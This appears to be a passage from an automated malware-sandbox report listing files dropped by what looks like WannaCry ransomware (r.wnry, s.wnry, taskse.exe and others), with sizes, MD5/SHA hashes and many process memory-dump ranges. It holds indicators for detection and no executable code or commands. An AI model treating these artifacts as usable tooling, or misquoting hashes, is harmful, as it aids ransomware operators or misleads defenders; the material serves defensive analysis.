ef25c3cf4343df85954114f59933c7cc8107266c8bcac3b5ea7718eb74dbee8ca8a02da39057e6ef26b64f1dfccd720dd3bf473f5ae340ba56941e87d6b796c9

Download Submit
C:\Users\Admin\Downloads\msg\m_vietnamese.wnry

Filesize
91KB

MD5
8419be28a0dcec3f55823620922b00fa

SHA1
2e4791f9cdfca8abf345d606f313d22b36c46b92

SHA256
1f21838b244c80f8bed6f6977aa8a557b419cf22ba35b1fd4bf0f98989c5bdf8

SHA512
8fca77e54480aea3c0c7a705263ed8fb83c58974f5f0f62f12cc97c8e0506ba2cdb59b70e59e9a6c44dd7cde6adeeec35b494d31a6a146ff5ba7006136ab9386

Download Submit
C:\Users\Admin\Downloads\r.wnry

Filesize
864B

MD5
3e0020fc529b1c2a061016dd2469ba96

SHA1
c3a91c22b63f6fe709e7c29cafb29a2ee83e6ade

SHA256
402751fa49e0cb68fe052cb3db87b05e71c1d950984d339940cf6b29409f2a7c

SHA512
5ca3c134201ed39d96d72911c0498bae6f98701513fd7f1dc8512819b673f0ea580510fa94ed9413ccc73da18b39903772a7cbfa3478176181cee68c896e14cf

Download Submit
C:\Users\Admin\Downloads\s.wnry

Filesize
2.9MB

MD5
ad4c9de7c8c40813f200ba1c2fa33083

SHA1
d1af27518d455d432b62d73c6a1497d032f6120e

SHA256
e18fdd912dfe5b45776e68d578c3af3547886cf1353d7086c8bee037436dff4b

SHA512
115733d08e5f1a514808a20b070db7ff453fd149865f49c04365a8c6502fa1e5c3a31da3e21f688ab040f583cf1224a544aea9708ffab21405dde1c57f98e617

Download Submit
C:\Users\Admin\Downloads\t.wnry

Filesize
64KB

MD5
5dcaac857e695a65f5c3ef1441a73a8f

SHA1
7b10aaeee05e7a1efb43d9f837e9356ad55c07dd

SHA256
97ebce49b14c46bebc9ec2448d00e1e397123b256e2be9eba5140688e7bc0ae6

SHA512
06eb5e49d19b71a99770d1b11a5bb64a54bf3352f36e39a153469e54205075c203b08128dc2317259db206ab5323bdd93aaa252a066f57fb5c52ff28deedb5e2

Download Submit
C:\Users\Admin\Downloads\taskdl.exe

Filesize
20KB

MD5
4fef5e34143e646dbf9907c4374276f5

SHA1
47a9ad4125b6bd7c55e4e7da251e23f089407b8f

SHA256
4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79

SHA512
4550dd1787deb353ebd28363dd2cdccca861f6a5d9358120fa6aa23baa478b2a9eb43cef5e3f6426f708a0753491710ac05483fac4a046c26bec4234122434d5

Download Submit
C:\Users\Admin\Downloads\taskse.exe

Filesize
20KB

MD5
8495400f199ac77853c53b5a3f278f3e

SHA1
be5d6279874da315e3080b06083757aad9b32c23

SHA256
2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d

SHA512
0669c524a295a049fa4629b26f89788b2a74e1840bcdc50e093a0bd40830dd1279c9597937301c0072db6ece70adee4ace67c3c8a4fb2db6deafd8f1e887abe4

Download Submit
C:\Users\Admin\Downloads\u.wnry

Filesize
240KB

MD5
7bf2b57f2a205768755c07f238fb32cc

SHA1
45356a9dd616ed7161a3b9192e2f318d0ab5ad10

SHA256
b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25

SHA512
91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

Download Submit
C:\Users\Admin\tmp\5QmoBigR3WN4ElrfB7

Filesize
20KB

MD5
42c395b8db48b6ce3d34c301d1eba9d5

SHA1
b7cfa3de344814bec105391663c0df4a74310996

SHA256
5644546ecefc6786c7be5b1a89e935e640963ccd34b130f21baab9370cb9055d

SHA512
7b9214db96e9bec8745b4161a41c4c0520cdda9950f0cd3f12c7744227a25d639d07c0dd68b552cf1e032181c2e4f8297747f27bad6c7447b0f415a86bd82845

Download Submit
memory/660-2856-0x00007FFEC0D50000-0x00007FFEC0E08000-memory.dmp

Filesize
736KB

Download
memory/660-2812-0x00007FFEDB510000-0x00007FFEDB529000-memory.dmp

Filesize
100KB

Download
memory/660-2924-0x00007FFED9BE0000-0x00007FFED9BED000-memory.dmp

Filesize
52KB

Download
memory/660-2923-0x00007FFEC0320000-0x00007FFEC043C000-memory.dmp

Filesize
1.1MB

Download
memory/660-2837-0x00007FFEDB530000-0x00007FFEDB554000-memory.dmp

Filesize
144KB

Download
memory/660-2838-0x00007FFED4600000-0x00007FFED4615000-memory.dmp

Filesize
84KB

Download
memory/660-2821-0x00007FFEC0440000-0x00007FFEC07B5000-memory.dmp

Filesize
3.5MB

Download
memory/660-2822-0x000002BE54E40000-0x000002BE551B5000-memory.dmp

Filesize
3.5MB

Download
memory/660-2820-0x00007FFEBFA10000-0x00007FFEBFFF8000-memory.dmp

Filesize
5.9MB

Download
memory/660-2974-0x00007FFEC2CF0000-0x00007FFEC2D12000-memory.dmp

Filesize
136KB

Download
memory/660-3008-0x00007FFEC2CD0000-0x00007FFEC2CE7000-memory.dmp

Filesize
92KB

Download
memory/660-2818-0x00007FFECD680000-0x00007FFECD6AE000-memory.dmp

Filesize
184KB

Download
memory/660-3024-0x00007FFEC2570000-0x00007FFEC2589000-memory.dmp

Filesize
100KB

Download
memory/660-3040-0x00007FFEC0D00000-0x00007FFEC0D4D000-memory.dmp

Filesize
308KB

Download
memory/660-2819-0x00007FFEC0D50000-0x00007FFEC0E08000-memory.dmp

Filesize
736KB

Download
memory/660-3081-0x00007FFEBF310000-0x00007FFEBFA04000-memory.dmp

Filesize
7.0MB

Download
memory/660-3089-0x00007FFEC00A0000-0x00007FFEC00D8000-memory.dmp

Filesize
224KB

Download
memory/660-2817-0x00007FFEC2590000-0x00007FFEC2703000-memory.dmp

Filesize
1.4MB

Download
memory/660-3135-0x00007FFED9BE0000-0x00007FFED9BED000-memory.dmp

Filesize
52KB

Download
memory/660-2816-0x00007FFED3B90000-0x00007FFED3BB3000-memory.dmp

Filesize
140KB

Download
memory/660-2814-0x00007FFEDB4E0000-0x00007FFEDB4F9000-memory.dmp

Filesize
100KB

Download
memory/660-2815-0x00007FFED9C80000-0x00007FFED9CAD000-memory.dmp

Filesize
180KB

Download
memory/660-2813-0x00007FFEDB500000-0x00007FFEDB50D000-memory.dmp

Filesize
52KB

Download
memory/660-2862-0x00007FFED4600000-0x00007FFED4615000-memory.dmp

Filesize
84KB

Download
memory/660-2811-0x00007FFEDC780000-0x00007FFEDC78F000-memory.dmp

Filesize
60KB

Download
memory/660-2863-0x00007FFEC00A0000-0x00007FFEC00D8000-memory.dmp

Filesize
224KB

Download
memory/660-2859-0x00007FFEC0440000-0x00007FFEC07B5000-memory.dmp

Filesize
3.5MB

Download
memory/660-2860-0x000002BE54E40000-0x000002BE551B5000-memory.dmp

Filesize
3.5MB

Download
memory/660-2861-0x00007FFEBF310000-0x00007FFEBFA04000-memory.dmp

Filesize
7.0MB

Download
memory/660-2841-0x00007FFEC2D20000-0x00007FFEC2D34000-memory.dmp

Filesize
80KB

Download
memory/660-2857-0x00007FFEDB4A0000-0x00007FFEDB4AA000-memory.dmp

Filesize
40KB

Download
memory/660-2858-0x00007FFEC00E0000-0x00007FFEC00FE000-memory.dmp

Filesize
120KB

Download
memory/660-2852-0x00007FFEC2590000-0x00007FFEC2703000-memory.dmp

Filesize
1.4MB

Download
memory/660-2853-0x00007FFECD680000-0x00007FFECD6AE000-memory.dmp

Filesize
184KB

Download
memory/660-2854-0x00007FFEC0D00000-0x00007FFEC0D4D000-memory.dmp

Filesize
308KB

Download
memory/660-2855-0x00007FFEC0100000-0x00007FFEC0111000-memory.dmp

Filesize
68KB

Download
memory/660-2851-0x00007FFED3B90000-0x00007FFED3BB3000-memory.dmp

Filesize
140KB

Download
memory/660-2850-0x00007FFEC2570000-0x00007FFEC2589000-memory.dmp

Filesize
100KB

Download
memory/660-2849-0x00007FFEC2CD0000-0x00007FFEC2CE7000-memory.dmp

Filesize
92KB

Download
memory/660-2848-0x00007FFED9C80000-0x00007FFED9CAD000-memory.dmp

Filesize
180KB

Download
memory/660-2847-0x00007FFEC2CF0000-0x00007FFEC2D12000-memory.dmp

Filesize
136KB

Download
memory/660-2839-0x00007FFED3A30000-0x00007FFED3A42000-memory.dmp

Filesize
72KB

Download
memory/660-2840-0x00007FFEC2D40000-0x00007FFEC2D54000-memory.dmp

Filesize
80KB

Download
memory/660-2842-0x00007FFEDB510000-0x00007FFEDB529000-memory.dmp

Filesize
100KB

Download
memory/660-2810-0x00007FFEDB530000-0x00007FFEDB554000-memory.dmp

Filesize
144KB

Download
memory/660-2809-0x00007FFEBFA10000-0x00007FFEBFFF8000-memory.dmp

Filesize
5.9MB

Download
memory/660-2843-0x00007FFEC0320000-0x00007FFEC043C000-memory.dmp

Filesize
1.1MB

Download
memory/1120-4063-0x00007FFED3730000-0x00007FFED375E000-memory.dmp

Filesize
184KB

Download
memory/1120-4059-0x00007FFED4080000-0x00007FFED4099000-memory.dmp

Filesize
100KB

Download
memory/1120-4062-0x00007FFEC0980000-0x00007FFEC0AF3000-memory.dmp

Filesize
1.4MB

Download
memory/1120-4061-0x00007FFED3800000-0x00007FFED3823000-memory.dmp

Filesize
140KB

Download
memory/1120-4060-0x00007FFED39C0000-0x00007FFED39ED000-memory.dmp

Filesize
180KB

Download
memory/1120-4066-0x000001B480100000-0x000001B480475000-memory.dmp

Filesize
3.5MB

Download
memory/1120-4065-0x00007FFEBBBF0000-0x00007FFEBBF65000-memory.dmp

Filesize
3.5MB

Download
memory/1120-4064-0x00007FFEC08C0000-0x00007FFEC0978000-memory.dmp

Filesize
736KB

Download
memory/1120-4067-0x00007FFED4060000-0x00007FFED4075000-memory.dmp

Filesize
84KB

Download
memory/1120-4070-0x00007FFED35C0000-0x00007FFED35D4000-memory.dmp

Filesize
80KB

Download
memory/1120-4069-0x00007FFED3630000-0x00007FFED3644000-memory.dmp

Filesize
80KB

Download
memory/1120-4068-0x00007FFED3EB0000-0x00007FFED3EC2000-memory.dmp

Filesize
72KB

Download
memory/1120-4071-0x00007FFEBDAA0000-0x00007FFEBDBBC000-memory.dmp

Filesize
1.1MB

Download
memory/1120-4073-0x00007FFEC4110000-0x00007FFEC4132000-memory.dmp

Filesize
136KB

Download
memory/1120-4072-0x00007FFEC3020000-0x00007FFEC3608000-memory.dmp

Filesize
5.9MB

Download
memory/1120-4074-0x00007FFED40A0000-0x00007FFED40C4000-memory.dmp

Filesize
144KB

Download
memory/1120-4075-0x00007FFED3320000-0x00007FFED3337000-memory.dmp

Filesize
92KB

Download
memory/1120-4076-0x00007FFEC40F0000-0x00007FFEC4109000-memory.dmp

Filesize
100KB

Download
memory/1120-4077-0x00007FFED4240000-0x00007FFED4259000-memory.dmp

Filesize
100KB

Download
memory/1120-4078-0x00007FFEC2F40000-0x00007FFEC2F8D000-memory.dmp

Filesize
308KB

Download
memory/1120-4106-0x00007FFED3800000-0x00007FFED3823000-memory.dmp

Filesize
140KB

Download
memory/1120-4111-0x00007FFEC08C0000-0x00007FFEC0978000-memory.dmp

Filesize
736KB

Download
memory/1120-4110-0x00007FFED3730000-0x00007FFED375E000-memory.dmp

Filesize
184KB

Download
memory/1120-4109-0x00007FFED8910000-0x00007FFED891A000-memory.dmp

Filesize
40KB

Download
memory/1120-4108-0x00007FFEC40D0000-0x00007FFEC40E1000-memory.dmp

Filesize
68KB

Download
memory/1120-4107-0x00007FFEC0980000-0x00007FFEC0AF3000-memory.dmp

Filesize
1.4MB

Download
memory/1120-4113-0x000001B480100000-0x000001B480475000-memory.dmp

Filesize
3.5MB

Download
memory/1120-4114-0x00007FFEC40B0000-0x00007FFEC40CE000-memory.dmp

Filesize
120KB

Download
memory/1120-4112-0x00007FFEBBBF0000-0x00007FFEBBF65000-memory.dmp

Filesize
3.5MB

Download
memory/1120-4117-0x00007FFEC2440000-0x00007FFEC2478000-memory.dmp

Filesize
224KB

Download
memory/1120-4116-0x00007FFED4060000-0x00007FFED4075000-memory.dmp

Filesize
84KB

Download
memory/1120-4115-0x00007FFEB6170000-0x00007FFEB6864000-memory.dmp

Filesize
7.0MB

Download
memory/1120-4145-0x00007FFED40A0000-0x00007FFED40C4000-memory.dmp

Filesize
144KB

Download
memory/1120-4152-0x00007FFED8910000-0x00007FFED891A000-memory.dmp

Filesize
40KB

Download
memory/1120-4151-0x00007FFED3800000-0x00007FFED3823000-memory.dmp

Filesize
140KB

Download
memory/1120-4150-0x00007FFED39C0000-0x00007FFED39ED000-memory.dmp

Filesize
180KB

Download
memory/1120-4149-0x00007FFED4080000-0x00007FFED4099000-memory.dmp

Filesize
100KB

Download
memory/1120-4148-0x00007FFED89B0000-0x00007FFED89BD000-memory.dmp

Filesize
52KB

Download
memory/1120-4147-0x00007FFED4240000-0x00007FFED4259000-memory.dmp

Filesize
100KB

Download
memory/1120-4146-0x00007FFEC40F0000-0x00007FFEC4109000-memory.dmp

Filesize
100KB

Download
memory/1120-4144-0x00007FFEC3020000-0x00007FFEC3608000-memory.dmp

Filesize
5.9MB

Download
memory/1120-4057-0x00007FFED4240000-0x00007FFED4259000-memory.dmp

Filesize
100KB

Download
memory/1120-4058-0x00007FFED89B0000-0x00007FFED89BD000-memory.dmp

Filesize
52KB

Download
memory/1120-4055-0x00007FFED40A0000-0x00007FFED40C4000-memory.dmp

Filesize
144KB

Download
memory/1120-4056-0x00007FFED89F0000-0x00007FFED89FF000-memory.dmp

Filesize
60KB

Download
memory/1120-4054-0x00007FFEC3020000-0x00007FFEC3608000-memory.dmp

Filesize
5.9MB

Download
memory/1288-269-0x0000000010000000-0x0000000010010000-memory.dmp

Filesize
64KB

Download
memory/1824-3743-0x0000000000EB0000-0x0000000000EC0000-memory.dmp

Filesize
64KB

Download
memory/2900-2927-0x0000027FE48B0000-0x0000027FE48D2000-memory.dmp

Filesize
136KB

Download
memory/4592-2412-0x0000000000FD0000-0x00000000012CE000-memory.dmp

Filesize
3.0MB

Download
memory/4592-2368-0x0000000073B10000-0x0000000073D2C000-memory.dmp

Filesize
2.1MB

Download
memory/4592-2362-0x0000000000FD0000-0x00000000012CE000-memory.dmp

Filesize
3.0MB

Download
memory/4592-2329-0x0000000000FD0000-0x00000000012CE000-memory.dmp

Filesize
3.0MB

Download
memory/4592-2317-0x0000000000FD0000-0x00000000012CE000-memory.dmp

Filesize
3.0MB

Download
memory/4592-2281-0x0000000073B10000-0x0000000073D2C000-memory.dmp

Filesize
2.1MB

Download
memory/4592-2275-0x0000000000FD0000-0x00000000012CE000-memory.dmp

Filesize
3.0MB

Download
memory/4592-2244-0x0000000000FD0000-0x00000000012CE000-memory.dmp

Filesize
3.0MB

Download
memory/4592-2216-0x0000000073B10000-0x0000000073D2C000-memory.dmp

Filesize
2.1MB

Download
memory/4592-2210-0x0000000000FD0000-0x00000000012CE000-memory.dmp

Filesize
3.0MB

Download
memory/4592-1799-0x0000000073E90000-0x0000000073F12000-memory.dmp

Filesize
520KB

Download
memory/4592-1800-0x0000000073E60000-0x0000000073E82000-memory.dmp

Filesize
136KB

Download
memory/4592-1801-0x0000000073E40000-0x0000000073E5C000-memory.dmp

Filesize
112KB

Download
memory/4592-1803-0x0000000073D30000-0x0000000073DA7000-memory.dmp

Filesize
476KB

Download
memory/4592-1798-0x0000000000FD0000-0x00000000012CE000-memory.dmp

Filesize
3.0MB

Download
memory/4592-1804-0x0000000073B10000-0x0000000073D2C000-memory.dmp

Filesize
2.1MB

Download
memory/4592-1802-0x0000000073DB0000-0x0000000073E32000-memory.dmp

Filesize
520KB

Download
memory/4592-1735-0x0000000073E90000-0x0000000073F12000-memory.dmp

Filesize
520KB

Download
memory/4592-1736-0x0000000073B10000-0x0000000073D2C000-memory.dmp

Filesize
2.1MB

Download
memory/4592-1737-0x0000000073DB0000-0x0000000073E32000-memory.dmp

Filesize
520KB

Download
memory/4592-1739-0x0000000000FD0000-0x00000000012CE000-memory.dmp

Filesize
3.0MB

Download
memory/4592-1738-0x0000000073E60000-0x0000000073E82000-memory.dmp

Filesize
136KB

Download
memory/4628-2469-0x00000000002B0000-0x00000000002D8000-memory.dmp

Filesize
160KB

Download